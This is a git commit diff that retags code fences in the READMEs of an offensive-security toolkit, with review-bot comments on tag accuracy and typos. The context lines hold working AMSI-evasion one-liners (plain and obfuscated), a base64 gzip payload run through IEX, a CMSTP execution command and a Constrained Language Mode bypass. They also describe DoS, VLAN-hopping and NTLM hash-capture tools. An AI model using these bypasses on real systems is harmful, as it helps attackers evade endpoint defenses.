readmes changed

Mariusz B. / mgeeky 2021-05-16 23:46:19 +02:00
parent ccf52e3dba
commit dfaf2ad518
6 changed files with 24 additions and 23 deletions

View File

@ -2,7 +2,7 @@
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. - **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
``` ```powershell
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,
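Review bot: the new info string `powershell` does not match the transcript in this block, which is a cmd.exe session (`c:\>py -3 tamperUpx.py ...`, not a `PS>` prompt). A neutral tag such as `text` or `console` would describe the content more honestly; `powershell` will cause highlighters to misparse the `::` banner lines and the `c:\>` prompt.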

View File

@ -3,7 +3,7 @@
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets. - **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
The effect will be similar to: The effect will be similar to:
``` ```shell
SW2960#show cdp traffic SW2960#show cdp traffic
CDP counters : CDP counters :
Total packets output: 361, Input: 11824 Total packets output: 361, Input: 11824
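Review bot: `shell` is the wrong tag for this hunk: the block is Cisco IOS CLI output (`SW2960#show cdp traffic` followed by counter lines), not a POSIX shell session. Tag it `text` so readers are not led to expect a bash transcript, and so no highlighter tries to treat `#` as a comment marker.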
@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA
interface. interface.
Sample run: Sample run:
``` ```powershell
PS D:\> python3 .\exchangeRecon.py 10.10.10.9 PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter :: Exchange Fingerprinter
@ -136,7 +136,7 @@ TODO:
- Implement sniffer hunting for used protocols and their auth strings - Implement sniffer hunting for used protocols and their auth strings
- Implement semi-auto mode that is first learning a network, then choosing specific attacks - Implement semi-auto mode that is first learning a network, then choosing specific attacks
``` ```bash
bash $ python RoutingAttackKit.py bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
@ -236,7 +236,7 @@ Capturing on 'eth0'
Sample output: Sample output:
``` ```bash
$ ./VLANHopperDTP.py --help $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation

View File

@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
``` ```bash
user@my-box $ startkali user@my-box $ startkali
[>] Launching kali in headless [>] Launching kali in headless
[>] Awaiting for machine to get up... [>] Awaiting for machine to get up...

View File

@ -7,7 +7,7 @@
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) - **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself. The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
``` ```powershell
PS > $ExecutionContext.SessionState.LanguageMode PS > $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage ConstrainedLanguage
PS > .\Bypass-CLM.ps1 PS > .\Bypass-CLM.ps1
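Review bot: while touching this hunk, the context line still reads "within it's current AppDomain"; the possessive is "its". The fence tag itself is correct here, since the block is a genuine `PS >` session.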
@ -48,7 +48,7 @@ FullLanguage
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage: - **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
``` ```powershell
cmstp.exe /ni /s cmstp.inf cmstp.exe /ni /s cmstp.inf
``` ```
@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf
Example: Example:
``` ```powershell
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
``` ```
@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes. Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
``` ```powershell
PS > "amsiInitFailed" PS > "amsiInitFailed"
At line:1 char:1 At line:1 char:1
+ "amsiInitFailed" + "amsiInitFailed"
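Review bot: the context paragraph in this hunk reads "hash-value computation algorithm was open-sources"; that should be "open-sourced", and "the attacker becomes able to customize hash-lookup scheme the way he likes" reads better as "an attacker can customize the hash-lookup scheme as needed". Worth fixing since the file is being edited anyway.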
@ -97,12 +97,12 @@ amsiInitFailed
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases: - OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes. * **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
``` ```powershell
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
``` ```
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes) * **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
``` ```powershell
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
``` ```
@ -125,7 +125,7 @@ amsiInitFailed
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates. - `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data. - `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
``` ```powershell
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09 PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results. Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results. Loaded $FileFinder results.
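Review bot: the cmdlet names in this hunk are inconsistent: the bullets document `Import-ReconData -DirName <DIR>` and `Get-ReconData -DirName <DIR>`, but the sample session that follows invokes `Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09`. Either the sample should read `Import-ReconData`, or the bullet should document `Load-ReconData` (possibly as an alias), so that readers copying the example call a cmdlet that exists.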
@ -176,7 +176,7 @@ This script can embed following data within constructed CSharp Task:
Example output **not minimized**: Example output **not minimized**:
``` ```powershell
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
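Review bot: this block is tagged `powershell`, but the prompt is a cmd.exe one (`C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py ...`). Suggest `text` or `console` for this block and for the identical `-m` (minimized) example in the next hunk; the tag should describe the transcript, not the language of the payload the script emits.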
@ -233,7 +233,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
**minimized** **minimized**
``` ```powershell
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
@ -251,13 +251,13 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`: This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
``` ```powershell
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
``` ```
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet. or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
``` ```powershell
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO + CONTOSO
+ SharedFolders + SharedFolders
@ -296,7 +296,7 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound. - **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
``` ```bash
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
[.] Connected to neo4j instance. [.] Connected to neo4j instance.
[.] Marking nodes (0..10) ... [.] Marking nodes (0..10) ...
@ -342,7 +342,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality - [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
``` ```powershell
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
:: SharpWebServer :: :: SharpWebServer ::
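Review bot: same mismatch as in the MSBuild examples: `C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true` is a cmd.exe invocation of a C# binary, so `powershell` is not an accurate tag for this block; `text` or `console` fits better.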
@ -377,7 +377,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly * The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
``` ```powershell
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.

View File

@ -31,7 +31,7 @@
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee)) - **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
``` ```python
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition # Simple utility that aids the penetration tester when manually testing Padding Oracle condition
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
# #
@ -84,7 +84,7 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4
When `DEBUG` is turned on, the output may also look like: When `DEBUG` is turned on, the output may also look like:
``` ```bash
$ ./reencode.py JTQxJTQxJTQxJTQx $ ./reencode.py JTQxJTQxJTQxJTQx
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"

View File

@ -41,7 +41,8 @@ I've experienced following:
Use `--verbose` for additional _field steps explanation_ output. Use `--verbose` for additional _field steps explanation_ output.
Sample usage: Sample usage:
```
```powershell
PS> python3 rdpFileUpload.py -v -f certutil README.md PS> python3 rdpFileUpload.py -v -f certutil README.md
:: RDP file upload utility via Keyboard emulation. :: RDP file upload utility via Keyboard emulation.
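Review bot: this hunk looks like it adds a fence rather than retagging one. The header reads `-41,7 +41,8` (a net addition, unlike every other hunk in this commit, which is 7 to 7), and a bare ``` line is still visible immediately before the new ```powershell line. If both survive, the bare ``` opens the code block and the ```powershell line becomes literal content inside it, and the existing closing fence then terminates the block early. The bare ``` line should be removed so the block opens with the single tagged fence, matching the other README changes.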